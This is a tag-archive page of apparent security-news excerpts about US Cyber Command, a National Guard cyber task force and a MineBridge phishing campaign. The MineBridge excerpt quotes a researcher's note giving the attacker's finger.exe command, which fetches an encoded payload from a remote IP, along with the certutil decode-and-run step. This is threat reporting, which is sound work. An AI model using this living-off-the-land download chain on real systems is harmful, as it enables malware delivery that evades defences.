Tag: command | Page 4

National Guard task force that supports Cyber Command changes over

February 12, 2021/in Internet Security

WASHINGTON — The Army recently announced a new tranche of National Guard units to staff a critical and ongoing task force for U.S. Cyber Command.

Members of the 123rd Cyber Protection Battalion — made up of guardsmen from Illinois, Minnesota, Virginia and Wisconsin – relieved the 15-month deployment of the 124th Cyber Protection Battalion for Task Force Echo, an Army announcement said.

The task force was described at its outset in 2017 as the largest mobilization of reserve forces in cyberspace, and to date over 600 National Guardsmen have been assigned to it. Now in its fifth iteration, soldiers will begin a 12-month deployment based at Fort Meade in Maryland.

Few details are publicly known about the task force, other than it supports full spectrum cyber operations. While under the control of Army Cyber Command’s 780th Military Intelligence Brigade, which conducts offensive cyber operations for Cyber Command, the task force has supported Cyber Command’s Cyber National Mission Force, which conducts offensive cyber operations under the guise of defense to protect the nation from malicious cyber actors. Sources have indicated that it has also supported Joint Task Force-Ares, which seeks to limit the Islamic State group’s abilities in the digital world.

While not “trigger pullers,” sources have also indicated the task force provides infrastructure support.

The task force has been described as beneficial to all organizations involved.

“I was impressed by the soldiers of Tasks Force Echo IV. They brought their real-world experience managing networks to the Army and made our organization better,” Col. Matthew Lennox, commander of the 780th Military Intelligence Brigade, said at an awards ceremony for the outgoing battalion. “Their knowledge and experience enabled teams within the Cyber National Mission Force and the different service Joint Force Headquarters to accomplish their mission. The Task Force Echo soldiers were integral members of the brigade team.”

The Army in recent years has begun to incorporate the National Guard and Reserve forces into all aspects of its cyber mission.

Source…

Windows Finger command abused by phishing to download malware

January 15, 2021/in Computer Security

Windows Finger

Attackers are using the normally harmless Windows Finger command to download and install a malicious backdoor on victims’ devices.

The ‘Finger’ command is a utility that originated in Linux/Unix operating systems that allows a local user to retrieve a list of users on a remote machine or information about a particular remote user. In addition to Linux, Windows includes a finger.exe command that performs the same functionality.

To execute the Finger command, a user would enter finger [user]@[remote_host]. For example, finger [email protected].

In September, we reported that security researchers discovered a way to use Finger as a LoLBin to download malware from a remote computer or exfiltrate data. LolBins are legitimate programs that can help attackers bypass security controls to fetch malware without triggering a security alert on the system.

Finger used in an active malware campaign

This week, security researcher Kirk Sayre found a phishing campaign utilizing the Finger command to download the MineBridge backdoor malware.

https://t.co/U0GtPdILCk ITW maldoc using finger.exe to download 2nd stage. Runs ‘finger nc20@184[.]164[.]146[.]102’ to pull down b64 encoded cert, certutil to decode, runs payload. Payload is https://t.co/LeJ8mIYyIh.

— Kirk Sayre (@bigmacjpg) January 14, 2021

FireEye first reported on the MineBridge malware after discovering numerous phishing campaigns targeting South Korean organizations. These phishing emails contain malicious Word documents disguised as job applicant resumes that install the MineBridge malware.

**MineBridge phishing email**
Source: FireEye

Like the previous MineBridge campaigns seen by FireEye, the one discovered by Sayre also pretends to be a resume from a job applicant, as shown below.

**Malicious MineBridge word document**
Source: BleepingComputer

When a victim clicks on the ‘Enabled Editing’ or ‘Enable Content’ buttons, a password protected macro will be executed to download the MineBridge malware and run it.

BleepingComputer was able to bypass the password-protection on the Word macro, which is shown below in its obfuscated form.

**Obfuscated malicious Word Macro**
Source: BleepingComputer

The deobfuscated command…

Source…

US Cyber Command now has teams around the world tracking hackers from Russia, China, Iran, N. Korea and more

November 3, 2020/in Computer Security

The U.S. Cyber Command has sent teams to Europe, the Middle East, and Asia as part of increased U.S. efforts to track down Russian, Iranian, Chinese, and North Korean hacking groups ahead of election day.

Military officials told the New York Times that Cyber Command, which runs the military’s offensive and defensive cyber operations, has expanded on efforts it began in 2018 to track foreign hacking operations and identify the methods they were using to break into computer networks.

2018 efforts primarily focused on counteracting Russian cybersecurity threats, but have expanded with cyber teams being sent to the Middle East and Asia. A U.S. intelligence report in August warned of Russian efforts to denigrate Democratic presidential candidate Joe Biden, and Chinese and Iranian efforts to undermine President Donald Trump.

“Since 2018, we have expanded our hunt forward operations to all major adversaries,” Lt. Gen. Charles L. Moore Jr., the deputy head of Cyber Command, told the New York Times in an interview at Fort Meade, Maryland.

Cyber Command refers to its efforts to proactively find hacker groups as “Hunt forward operations.” Cyber Command efforts are reportedly aimed at getting close to foreign hacker groups to identify and potentially stop cyberattacks against the U.S.

Moore described the Cyber Command actions as a proactive effort to defend against hackers. He told the New York Times, “We want to take down the archer rather than dodge the arrows.”

Cyber Command continued to assist in operations against potential cyber-attacks following the 2018 election and Moore said the anti-hacking past Election Day in 2020.

“We are not stopping or thinking about our operations slacking off on Nov. 3,” Moore told the New York Times. “Defending the election is now a persistent and ongoing campaign for Cyber Command.”

In 2018 Cyber Command reportedly sent teams to North Macedonia, Montenegro and other countries to learn more about Russian operations. Cyber Command also sent warnings to potential Russian trolls and reportedly worked to keep at least one Russian troll-farm offline on election day during the 2018 U.S. midterm elections.

Cyber Command also…

Source…

Report: US Cyber Command Behind Trickbot Tricks — Krebs on Security – Krebs on Security

October 11, 2020/in Computer Security

Report: US Cyber Command Behind Trickbot Tricks — Krebs on Security Krebs on Security
“computer security news” – read more

Tag Archive for: command

Know all the coolest acronyms

Finger used in an active malware campaign